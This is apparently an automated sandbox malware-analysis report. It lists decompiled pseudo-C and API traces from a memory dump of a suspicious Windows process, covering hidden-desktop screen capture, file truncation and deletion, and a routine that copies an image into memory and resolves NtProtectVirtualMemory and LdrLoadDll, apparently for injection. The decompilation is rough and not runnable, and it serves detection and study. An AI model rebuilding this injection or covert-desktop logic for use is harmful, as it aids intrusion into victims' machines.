Function 00C7D578, Relevance: 19.7, APIs: 13, Instructions: 154
synchronizationmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00C7D578(void* __ebx, signed int __edx, void* __esi, void* __esp, void* __eflags, signed int* __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int* __r8, void* __r9, void* __r10, void* __r11, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				void* __rbp;
				void* __r12;
				void* __r13;
				long _t43;
				signed int _t53;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t72;
				void* _t73;
				void* _t76;
				signed int* _t88;
				void* _t90;
				long long _t94;
				long long _t113;
				signed int* _t116;
				signed int* _t118;
				void* _t119;
				void* _t120;
				signed int* _t123;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t130;
				void* _t131;
				signed int* _t132;

				_t128 = __r11;
				_t127 = __r10;
				_t126 = __r9;
				_t123 = __r8;
				_t113 = __rdi;
				_t88 = __rax;
				_t76 = __esp;
				_t65 = __edx;
				_t62 = __ebx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t119 = _t120;
				_t90 = __rcx;
				_t72 = 0x21;
				r12d = 0;
				r13d = 0;
				SetThreadDesktop(??);
				E00C7D7C4();
				r14d = r14d | 0xffffffff;
				_t94 =  *((intOrPtr*)(_t90 + 0x760));
				r9d = r14d;
				_v56 =  *((intOrPtr*)(_t90 + 0x20));
				r8d = 0;
				_v48 = _t94;
				_t10 = _t113 - 0x1f; // 0x2
				_t63 = _t10;
				_a8 = _t88;
				_t116 = _t88;
				_t43 = WaitForMultipleObjects(??, ??, ??, ??);
				if(_t43 == 0) {
					L23:
					return _t43;
				}
				r15d = 0x1f4;
				do {
					if(_t43 != 1) {
						if(_t43 != 0x102) {
							goto L23;
						}
						L5:
						if(E00C82BBC(_t62, _t63, _t65, _t88, _t126) <= 0x1e) {
							_t73 = _t72 + 0xfffffff6;
						} else {
							_t73 = _t72 + 0xa;
						}
						_t74 =  <  ? 0x21 : _t73;
						_t72 =  >  ? r15d :  <  ? 0x21 : _t73;
						E00C7D7C4();
						_t64 = _t72;
						if(_t88 - _t116 < _t94) {
							_t43 = WaitForSingleObject();
							if(_t43 != 0x102) {
								goto L23;
							}
						}
						goto L10;
					}
					asm("movups xmm0, [ebx+0x70]");
					r13d =  *(_t90 + 0x80);
					r12d = _t43;
					asm("movdqu [ebp-0x20], xmm0");
					goto L5;
					L10:
					WaitForSingleObject();
					E00C7D0E0(_t90, _t90,  &_v72, _t113, _t116, _t123, _t126);
					ReleaseMutex(??);
					if(r13d != 0) {
						_t65 = r14d;
						WaitForSingleObject(??, ??);
						r8d = 1;
						E00C7F004(_t90,  &_v72, _t123);
						_t94 =  *((intOrPtr*)(_t90 + 0x768));
						_t132 = _t88;
						ReleaseMutex(??);
						if(_t132 != 0) {
							r8d = 0;
							_t65 = 0;
							_t53 = GetRegionData(??, ??, ??);
							r14d = _t53;
							if(_t53 != 0) {
								r8d = r14d;
								_t65 = 0;
								HeapAlloc(??, ??, ??);
								_t118 = _t88;
								if(_t88 != 0) {
									if(GetRegionData() != 0) {
										_t68 =  *((intOrPtr*)(_t118 + 8));
										if( *((intOrPtr*)(_t118 + 8)) != 0) {
											_t33 = _t118 + 0x20; // 0x20
											E00C6BF10(_t64, _t68, _t76, _t88, _t90,  *((intOrPtr*)(_t90 + 8)), _t118, _t119, _t33, _t126, _t127, _t128, _t130, _t131);
										}
									}
									_t123 = _t118;
									_t65 = 0;
									HeapFree(??, ??, ??);
								}
								_t116 = _a8;
							}
							_t94 = _t132;
							DeleteObject(??);
							r14d = r14d | 0xffffffff;
						}
						r15d = 0x1f4;
					} else {
						_t123 =  &_v72;
						_t94 =  *((intOrPtr*)(_t90 + 8));
						_t20 = _t131 + 1; // 0x1
						_t65 = _t20;
						_v72 = _v72 & r13d;
						_v68 = _v68 & r13d;
						_v64 =  *((intOrPtr*)(_t90 + 0x294));
						_v60 =  *((intOrPtr*)(_t90 + 0x298));
						E00C6BF10(_t64, _t20, _t76, _t88, _t90, _t94, _t116, _t119, _t123, _t126, _t127, _t128, _t130, _t131);
						r12d = 0;
					}
					r9d = r14d;
					r9d =  !=  ? _t72 : r9d;
					r8d = 0;
					_t36 = _t123 + 2; // 0x2
					_t63 = _t36;
					_t43 = WaitForMultipleObjects(??, ??, ??, ??);
				} while (_t43 != 0);
				goto L23;
			}

0x00c7d578
0x00c7d578
0x00c7d578
0x00c7d578
0x00c7d578
0x00c7d578
0x00c7d578
0x00c7d578
0x00c7d578
0x00c7d578
0x00c7d57d
0x00c7d582
0x00c7d590
0x00c7d597
0x00c7d59a
0x00c7d5a6
0x00c7d5a9
0x00c7d5ac
0x00c7d5b2
0x00c7d5bb
0x00c7d5bf
0x00c7d5c6
0x00c7d5c9
0x00c7d5cd
0x00c7d5d0
0x00c7d5d8
0x00c7d5d8
0x00c7d5db
0x00c7d5df
0x00c7d5e2
0x00c7d5ea
0x00c7d7a6
0x00c7d7c3
0x00c7d7c3
0x00c7d5f0
0x00c7d5f6
0x00c7d5f9
0x00c7d615
0x00000000
0x00000000
0x00c7d61b
0x00c7d624
0x00c7d62b
0x00c7d626
0x00c7d626
0x00c7d626
0x00c7d635
0x00c7d63b
0x00c7d63f
0x00c7d647
0x00c7d64f
0x00c7d65b
0x00c7d666
0x00000000
0x00000000
0x00c7d666
0x00000000
0x00c7d64f
0x00c7d5fb
0x00c7d5ff
0x00c7d606
0x00c7d609
0x00000000
0x00c7d66c
0x00c7d676
0x00c7d683
0x00c7d68f
0x00c7d698
0x00c7d6d4
0x00c7d6d7
0x00c7d6dd
0x00c7d6ea
0x00c7d6ef
0x00c7d6f6
0x00c7d6f9
0x00c7d702
0x00c7d704
0x00c7d707
0x00c7d70c
0x00c7d712
0x00c7d717
0x00c7d720
0x00c7d723
0x00c7d725
0x00c7d72b
0x00c7d731
0x00c7d744
0x00c7d746
0x00c7d74b
0x00c7d751
0x00c7d755
0x00c7d755
0x00c7d74b
0x00c7d761
0x00c7d764
0x00c7d766
0x00c7d766
0x00c7d76c
0x00c7d76c
0x00c7d770
0x00c7d773
0x00c7d779
0x00c7d779
0x00c7d77d
0x00c7d69a
0x00c7d6a0
0x00c7d6a4
0x00c7d6a8
0x00c7d6a8
0x00c7d6ac
0x00c7d6b0
0x00c7d6b4
0x00c7d6bd
0x00c7d6c0
0x00c7d6c5
0x00c7d6c5
0x00c7d783
0x00c7d78d
0x00c7d791
0x00c7d794
0x00c7d794
0x00c7d798
0x00c7d79e
0x00000000

APIs

SetThreadDesktop.USER32 ref: 00C7D5AC

Part of subcall function 00C7D7C4: GetSystemTime.KERNEL32(?,?,?,?,?,?,00C7D5B7), ref: 00C7D7CD
Part of subcall function 00C7D7C4: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00C7D5B7), ref: 00C7D7DD

WaitForMultipleObjects.KERNEL32 ref: 00C7D5E2
WaitForSingleObject.KERNEL32 ref: 00C7D65B
WaitForSingleObject.KERNEL32 ref: 00C7D676
ReleaseMutex.KERNEL32 ref: 00C7D68F
WaitForSingleObject.KERNEL32 ref: 00C7D6D7

Part of subcall function 00C7F004: CreateRectRgn.GDI32 ref: 00C7F06C
Part of subcall function 00C7F004: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C7F20F
Part of subcall function 00C7F004: DeleteObject.GDI32 ref: 00C7F244

ReleaseMutex.KERNEL32 ref: 00C7D6F9
GetRegionData.GDI32 ref: 00C7D70C
HeapAlloc.KERNEL32 ref: 00C7D725
GetRegionData.GDI32 ref: 00C7D73C
HeapFree.KERNEL32 ref: 00C7D766

Part of subcall function 00C6BF10: EnterCriticalSection.KERNEL32 ref: 00C6BF3A
Part of subcall function 00C6BF10: LeaveCriticalSection.KERNEL32 ref: 00C6C004

DeleteObject.GDI32 ref: 00C7D773
WaitForMultipleObjects.KERNEL32 ref: 00C7D798

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ObjectWait$SingleTime$CriticalDataDeleteHeapMultipleMutexObjectsRegionReleaseSectionSystem$AllocCreateDesktopEnterFileFreeLeaveRectSleepThread
String ID:
API String ID: 1144057579-0
Opcode ID: da3be630a0ba1e40105d534cd6eeac71052ab4df365ac908b0c295fcf44478ee
Instruction ID: 074085b5288fe4a3f8037dba8410217485933fc513cb888fcb33b659c4742d3e
Opcode Fuzzy Hash: da3be630a0ba1e40105d534cd6eeac71052ab4df365ac908b0c295fcf44478ee
Instruction Fuzzy Hash: 59516D76700A4186EB10DF36D844BAE23B1FB88B98F54DA21DE1E97B58DF38C54AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00C6C22C, Relevance: 19.7, APIs: 13, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7F758: GetTickCount.KERNEL32 ref: 00C7F77B
Part of subcall function 00C7F758: lstrlenA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7A7
Part of subcall function 00C7F758: HeapAlloc.KERNEL32(?,?,?,00C6C267), ref: 00C7F7C3
Part of subcall function 00C7F758: memset.NTDLL(?,?,?,00C6C267), ref: 00C7F7E0
Part of subcall function 00C7F758: CreateMutexA.KERNEL32(?,?,?,00C6C267), ref: 00C7F7F0
Part of subcall function 00C7F758: GetLastError.KERNEL32(?,?,?,00C6C267), ref: 00C7F879
Part of subcall function 00C7F758: HeapFree.KERNEL32(?,?,?,00C6C267), ref: 00C7F892

HeapAlloc.KERNEL32 ref: 00C6C2A8
memcpy.NTDLL ref: 00C6C342
memcpy.NTDLL ref: 00C6C355
GetLastError.KERNEL32 ref: 00C6C3BC
EnterCriticalSection.KERNEL32 ref: 00C6C3CB
LeaveCriticalSection.KERNEL32 ref: 00C6C3E3
shutdown.WS2_32 ref: 00C6C3F2
closesocket.WS2_32 ref: 00C6C3FC
HeapFree.KERNEL32 ref: 00C6C424
HeapFree.KERNEL32 ref: 00C6C43F
CloseHandle.KERNEL32 ref: 00C6C44E
DeleteCriticalSection.KERNEL32 ref: 00C6C45D
HeapFree.KERNEL32 ref: 00C6C46F

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Free$CriticalSection$AllocErrorLastmemcpy$CloseCountCreateDeleteEnterHandleLeaveMutexTickclosesocketlstrlenmemsetshutdown
String ID:
API String ID: 1415166864-0
Opcode ID: 92911cd3b9835e6d25c4c87bca1a78986f5affa537627ec70d6e988339faeff1
Instruction ID: 4dd01762604ba5ed42690db05405f4173cae318164d2e56a1efc3d6e8c67b3e8
Opcode Fuzzy Hash: 92911cd3b9835e6d25c4c87bca1a78986f5affa537627ec70d6e988339faeff1
Instruction Fuzzy Hash: 8D61C166200B9082EB24DF26D8947BC77A0FB98F94F488126DE9D87B25DF3CC556C350

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A6DC, Relevance: 19.6, APIs: 13, Instructions: 125
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00C7A6DC(void* __edx, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56, long long* _a64) {
				long long _v56;
				void* __rdi;
				long _t18;
				void* _t37;
				void* _t38;
				long _t43;
				intOrPtr* _t52;
				long long _t54;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t84;
				void* _t87;
				long long _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;

				_t54 = __rbx;
				_t52 = __rax;
				_t38 = __edx;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t102 = __rdx;
				r13d = 0;
				r15d = r13d;
				_t87 = __r8;
				_t80 = __rcx;
				E00C7A500(__rbx, __rcx, _a40, __rcx, __r9);
				_t103 = _t52;
				if(_t52 != 0) {
					E00C7A42C(_t37, _t38, _t52, _t54, _t87, __r9, _t87, __r9);
					_v56 = _t102;
					_t104 = _t52;
					_t18 = E00C79F90(_t52, _t54, _t80, _a40, _t80, __r9, _t52, _t103);
					_t43 = _t18;
					if(_t18 == 0 || _t18 == 3) {
						_t81 = _a48;
						if(_t81 != 0) {
							lstrlenW();
						}
						_t84 = _a56;
						if(_t84 != 0) {
							lstrlenW();
						}
						lstrlenW();
						HeapAlloc(??, ??, ??);
						_t54 = _t52;
						if(_t52 != 0) {
							if(_t81 == 0) {
								 *_t52 = r13w;
							} else {
								lstrcpyW();
							}
							lstrcatW();
							lstrcatW(??, ??);
							lstrcatW(??, ??);
							if(_t84 != 0) {
								lstrcatW();
							}
							_t43 = r13d;
							goto L17;
						} else {
							_t11 = _t52 + 8; // 0x8
							_t43 = _t11;
							goto L21;
						}
					} else {
						goto L17;
					}
				} else {
					_t43 = GetLastError();
					L17:
					if(_t43 == 0) {
						 *_a64 = _t54;
					} else {
						if(_t54 != 0) {
							HeapFree();
						}
					}
					L21:
					if(_t104 != 0) {
						HeapFree();
					}
					if(_t103 != 0) {
						HeapFree();
					}
					return _t43;
				}
			}

0x00c7a6dc
0x00c7a6dc
0x00c7a6dc
0x00c7a6dc
0x00c7a6e1
0x00c7a6e6
0x00c7a6f8
0x00c7a6fb
0x00c7a706
0x00c7a70f
0x00c7a712
0x00c7a715
0x00c7a71a
0x00c7a720
0x00c7a738
0x00c7a74b
0x00c7a753
0x00c7a756
0x00c7a75b
0x00c7a75f
0x00c7a76a
0x00c7a775
0x00c7a77a
0x00c7a780
0x00c7a783
0x00c7a78e
0x00c7a793
0x00c7a799
0x00c7a7a4
0x00c7a7c0
0x00c7a7c6
0x00c7a7cc
0x00c7a7d6
0x00c7a7e6
0x00c7a7d8
0x00c7a7de
0x00c7a7de
0x00c7a7f4
0x00c7a800
0x00c7a810
0x00c7a819
0x00c7a821
0x00c7a821
0x00c7a827
0x00000000
0x00c7a7ce
0x00c7a7ce
0x00c7a7ce
0x00000000
0x00c7a7ce
0x00000000
0x00000000
0x00000000
0x00c7a722
0x00c7a728
0x00c7a82a
0x00c7a82c
0x00c7a84f
0x00c7a82e
0x00c7a831
0x00c7a83f
0x00c7a83f
0x00c7a831
0x00c7a852
0x00c7a855
0x00c7a863
0x00c7a863
0x00c7a86c
0x00c7a87a
0x00c7a87a
0x00c7a89e
0x00c7a89e

APIs

Part of subcall function 00C7A500: GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
Part of subcall function 00C7A500: GetLastError.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A537
Part of subcall function 00C7A500: HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661

GetLastError.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A722
lstrlenW.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A77A
lstrlenW.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A793
lstrlenW.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A7A4
HeapAlloc.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A7C0
HeapFree.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A83F
HeapFree.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A863
HeapFree.KERNEL32(?,?,?,?,?,00C76E21), ref: 00C7A87A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Free$lstrlen$ErrorLast$AllocPathTemp
String ID:
API String ID: 547147443-0
Opcode ID: a3cb981e41cfd0dc8b6aadb3b01a9376ca9b9713a08df61940ad41ec5ae7dd0b
Instruction ID: a74b0f6550fd5af739546ddbc2c7d5f580d8eaaa2cb8c2cce33e254f4b924feb
Opcode Fuzzy Hash: a3cb981e41cfd0dc8b6aadb3b01a9376ca9b9713a08df61940ad41ec5ae7dd0b
Instruction Fuzzy Hash: B9418025704F8182EB299F23B854B2AA361BBC4FE4F58C125DD5E47B29DF3CC54A8305

Uniqueness

Uniqueness Score: -1.00%

Function 00C801BC, Relevance: 19.6, APIs: 13, Instructions: 98fileCOMMON

Download Yara Rule

APIs

memset.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00C801F5
GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00C80218
CreateFileW.KERNEL32 ref: 00C80241
GetLastError.KERNEL32 ref: 00C80250
SetFilePointerEx.KERNEL32 ref: 00C8026C
SetFilePointerEx.KERNEL32 ref: 00C8027F
ReadFile.KERNEL32 ref: 00C802B8
SetFilePointerEx.KERNEL32 ref: 00C802DC
SetEndOfFile.KERNEL32 ref: 00C802E5
CloseHandle.KERNEL32 ref: 00C802EE
DeleteFileW.KERNEL32 ref: 00C802FB

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Pointer$Handle$CloseCreateDeleteErrorInformationLastReadmemset
String ID:
API String ID: 3299833539-0
Opcode ID: d07bbc1b573347febf1aa77af4760e5035d12f1194af09bdfc3408afbebd1699
Instruction ID: 56ac64cc585fff43c7e94f817c89d966e0342d13003227ffce1493cd9914c816
Opcode Fuzzy Hash: d07bbc1b573347febf1aa77af4760e5035d12f1194af09bdfc3408afbebd1699
Instruction Fuzzy Hash: 15414532710A409AE7609FA2E854BAD33A1F788FD9F419225EE1957F58DF78C2498708

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B1E0, Relevance: 19.6, APIs: 13, Instructions: 79sleepmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B20F
shutdown.WS2_32 ref: 00C6B228
closesocket.WS2_32 ref: 00C6B232
EnterCriticalSection.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B240
shutdown.WS2_32 ref: 00C6B25A
CloseHandle.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B264
LeaveCriticalSection.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B272
Sleep.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B27F
CloseHandle.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B298
CloseHandle.KERNEL32(?,?,?,00C68D7C,?,?,00000000,00C62128), ref: 00C6B2A7
HeapFree.KERNEL32 ref: 00C82F1D
FreeLibrary.KERNEL32 ref: 00C82F2F
FreeLibrary.KERNEL32 ref: 00C82F41

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseFreeHandle$CriticalLibrarySectionshutdown$EnterEventHeapLeaveSleepclosesocket
String ID:
API String ID: 2847004285-0
Opcode ID: 8a9e28428485d0e709d30c90a5324a0258120695dfeeae9dd847fd4691e1bd02
Instruction ID: ddad1905d9a6a72b8b7b018b1308c40103893880495e6d7fa3bd5f7cf132e320
Opcode Fuzzy Hash: 8a9e28428485d0e709d30c90a5324a0258120695dfeeae9dd847fd4691e1bd02
Instruction Fuzzy Hash: 89312F35706B40D6FB29DF62E8A876D2370FB84F94F548215DB5A47A24CF38C99AC304

Uniqueness

Uniqueness Score: -1.00%

Function 00C619A8, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00C619A8(signed int __edx, void* __edi, void* __ebp, long long __rbx, signed long long __rcx, void* __r9, long long _a8, signed int _a16, long long _a24, signed long long _a32) {
				signed long long _v72;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t34;
				signed long long _t36;
				signed long long _t39;
				signed long long _t40;
				intOrPtr _t43;
				intOrPtr _t44;
				signed long long _t55;
				intOrPtr _t56;
				intOrPtr _t60;
				void* _t62;
				signed int _t64;
				void* _t65;
				signed long long _t74;
				long long _t75;
				signed long long _t77;
				long long _t87;
				intOrPtr _t107;
				void* _t108;
				signed long long _t109;
				signed long long _t110;
				void* _t112;
				void* _t113;
				void* _t124;
				void* _t126;
				signed long long _t127;
				signed long long _t129;
				signed long long _t130;

				_t124 = __r9;
				_t77 = __rcx;
				_t75 = __rbx;
				_t65 = __ebp;
				_t62 = __edi;
				_a8 = __rbx;
				_a16 = __edx;
				_t112 = _t113;
				_t107 =  *0xc95608; // 0xcc5c50
				r13d = 0;
				_a32 = _t127;
				_t64 = __edx & 0x00000010;
				_a24 = _t127;
				_t130 = __rcx;
				_v72 = _t127;
				_t108 =  !=  ?  *0xc95600 : _t107;
				_t126 =  ==  ? E00C66190 : 0xc91400;
				if(_t108 != 0) {
					_t7 = _t108 + 0x3c; // 0xeba1f0e000000f0
					_t69 =  *_t7;
					_t56 =  *0xc95610; // 0x2b000
					r14d =  *( *_t7 + _t108 + 0x50);
					_t34 =  *0xc95614; // 0x35800
					r14d = r14d + 0xfff;
					r14d = r14d & 0xfffff000;
					_t36 = E00C63450(_t56 + _t34 + 0xc58 + r14d,  *_t7, __rbx,  &_a32, _t108, _t111,  &_v72);
					_t55 = _t36;
					__eflags = _t36;
					if(_t36 != 0) {
						L26:
						__eflags = _a32;
						if(_a32 != 0) {
							__eflags = _t77 | 0xffffffff;
							E00C636F8();
						}
						__eflags = _v72;
						if(_v72 != 0) {
							CloseHandle();
						}
						goto L30;
					}
					_t77 = _v72;
					_t39 = E00C636A8(_t124);
					_t55 = _t39;
					__eflags = _t39;
					if(_t39 != 0) {
						goto L26;
					}
					_t77 = _a32;
					_t40 = E00C63554(_t69, _t75, _t77, _t108, _t111, _a24, _t124);
					_t55 = _t40;
					__eflags = _t40;
					if(_t40 != 0) {
						goto L26;
					}
					r8d =  *0xc95610; // 0x2b000
					r13d = r14d;
					memcpy(??, ??, ??);
					r8d =  *0xc95614; // 0x35800
					memcpy(??, ??, ??);
					_t129 = _a32 + _t127;
					 *((long long*)(_t129 + 0x30)) = _a24;
					_t87 = _a24 + 0xc58 + _t127;
					 *((long long*)(_t129 + 0x18)) = _t87;
					_t60 =  *0xc95610; // 0x2b000
					_t74 = _a24 + 0xc58;
					 *((long long*)(_t129 + 0x20)) = _t87 + _t127 + _t74;
					_t43 =  *0xc95610; // 0x2b000
					 *((intOrPtr*)(_t129 + 0x28)) = _t43;
					_t44 =  *0xc95614; // 0x35800
					 *((intOrPtr*)(_t129 + 0x2c)) = _t44;
					__eflags = _t64;
					if(_t64 == 0) {
						__eflags =  *0xc95618 - _t75; // 0x0
						if(__eflags == 0) {
							L17:
							_t77 = L"NTDLL.DLL";
							_t55 = 0x7f;
							GetModuleHandleW(??);
							_t109 = _t74;
							__eflags = _t74;
							if(_t74 == 0) {
								L24:
								__eflags = _t55;
								if(_t55 == 0) {
									r8d = 0x800;
									memcpy(??, ??, ??);
									_t77 = _t130;
									r9d = _a16;
									__eflags = _a24 + _t127;
									_t55 = E00C64500(_t74, _t75, _t77, _a24 + _t127 + 0x48, _t111, _t112, _a24 + _t127);
								}
								goto L26;
							}
							_t77 = _t74;
							E00C64B0C(_t62, _t65, _t74, _t75, _t77, "LdrLoadDll");
							 *0xc95618 = _t74;
							__eflags = _t74;
							if(_t74 == 0) {
								goto L24;
							}
							_t77 = _t109;
							E00C64B0C(_t62, _t65, _t74, _t75, _t77, "LdrGetProcedureAddress");
							 *0xc95620 = _t74;
							__eflags = _t74;
							if(_t74 == 0) {
								goto L24;
							}
							_t77 = _t109;
							E00C64B0C(_t62, _t65, _t74, _t75, _t77, "NtProtectVirtualMemory");
							 *0xc95628 = _t74;
							__eflags = _t74;
							if(_t74 == 0) {
								goto L24;
							}
							_t55 = 0;
							__eflags = 0;
							L22:
							L23:
							r8d = 0x18;
							_t77 = _t129;
							memcpy(??, ??, ??);
							goto L24;
						}
						__eflags =  *0xc95620 - _t75; // 0x0
						if(__eflags == 0) {
							goto L17;
						}
						__eflags =  *0xc95628 - _t75; // 0x0
						if(__eflags != 0) {
							goto L22;
						}
						goto L17;
					}
					__eflags =  *0xc95630 - _t75; // 0x0
					_t110 =  *_t130;
					if(__eflags == 0) {
						L9:
						_t111 = "NTDLL.DLL";
						_t77 = _t110;
						_t55 = 0x7f;
						E00C64750(_t60, _t65, __eflags, _t75, _t77, "NTDLL.DLL", "NTDLL.DLL", "LdrLoadDll");
						 *0xc95630 = _t74;
						__eflags = _t74;
						if(__eflags == 0) {
							goto L24;
						}
						_t77 = _t110;
						E00C64750(_t60, _t65, __eflags, _t75, _t77, "NTDLL.DLL", _t111, "LdrGetProcedureAddress");
						 *0xc95638 = _t74;
						__eflags = _t74;
						if(__eflags == 0) {
							goto L24;
						}
						_t77 = _t110;
						E00C64750(_t60, _t65, __eflags, _t75, _t77, _t111, _t111, "NtProtectVirtualMemory");
						 *0xc95640 = _t74;
						__eflags = _t74;
						if(_t74 == 0) {
							goto L24;
						}
						_t55 = 0;
						__eflags = 0;
						L13:
						goto L23;
					}
					__eflags =  *0xc95638 - _t75; // 0x0
					if(__eflags == 0) {
						goto L9;
					}
					__eflags =  *0xc95640 - _t75; // 0x0
					if(__eflags != 0) {
						goto L13;
					}
					goto L9;
				} else {
					_t6 = _t108 + 2; // 0xcc5c52
					_t55 = _t6;
					L30:
					return _t55;
				}
			}

0x00c619a8
0x00c619a8
0x00c619a8
0x00c619a8
0x00c619a8
0x00c619a8
0x00c619ad
0x00c619bc
0x00c619c3
0x00c619d1
0x00c619dd
0x00c619e1
0x00c619e4
0x00c619e8
0x00c619eb
0x00c619ef
0x00c619f9
0x00c61a00
0x00c61a0a
0x00c61a0a
0x00c61a12
0x00c61a1c
0x00c61a21
0x00c61a27
0x00c61a33
0x00c61a3f
0x00c61a44
0x00c61a46
0x00c61a48
0x00c61c90
0x00c61c94
0x00c61c97
0x00c61c99
0x00c61c9d
0x00c61c9d
0x00c61ca6
0x00c61ca9
0x00c61cab
0x00c61cab
0x00000000
0x00c61ca9
0x00c61a55
0x00c61a59
0x00c61a5e
0x00c61a60
0x00c61a62
0x00000000
0x00000000
0x00c61a6f
0x00c61a73
0x00c61a78
0x00c61a7a
0x00c61a7c
0x00000000
0x00000000
0x00c61a86
0x00c61a9b
0x00c61aa1
0x00c61ab3
0x00c61aca
0x00c61ad7
0x00c61ada
0x00c61ae9
0x00c61aec
0x00c61af0
0x00c61afd
0x00c61b06
0x00c61b0a
0x00c61b10
0x00c61b14
0x00c61b1a
0x00c61b1e
0x00c61b20
0x00c61bc4
0x00c61bcb
0x00c61bdf
0x00c61bdf
0x00c61be6
0x00c61beb
0x00c61bf1
0x00c61bf4
0x00c61bf7
0x00c61c61
0x00c61c61
0x00c61c63
0x00c61c69
0x00c61c72
0x00c61c7b
0x00c61c7e
0x00c61c82
0x00c61c8e
0x00c61c8e
0x00000000
0x00c61c63
0x00c61c00
0x00c61c03
0x00c61c08
0x00c61c0f
0x00c61c12
0x00000000
0x00000000
0x00c61c1b
0x00c61c1e
0x00c61c23
0x00c61c2a
0x00c61c2d
0x00000000
0x00000000
0x00c61c36
0x00c61c39
0x00c61c3e
0x00c61c45
0x00c61c48
0x00000000
0x00000000
0x00c61c4a
0x00c61c4a
0x00c61c4c
0x00c61c53
0x00c61c53
0x00c61c59
0x00c61c5c
0x00000000
0x00c61c5c
0x00c61bcd
0x00c61bd4
0x00000000
0x00000000
0x00c61bd6
0x00c61bdd
0x00000000
0x00000000
0x00000000
0x00c61bdd
0x00c61b26
0x00c61b2d
0x00c61b30
0x00c61b44
0x00c61b44
0x00c61b4b
0x00c61b58
0x00c61b5d
0x00c61b62
0x00c61b69
0x00c61b6c
0x00000000
0x00000000
0x00c61b7c
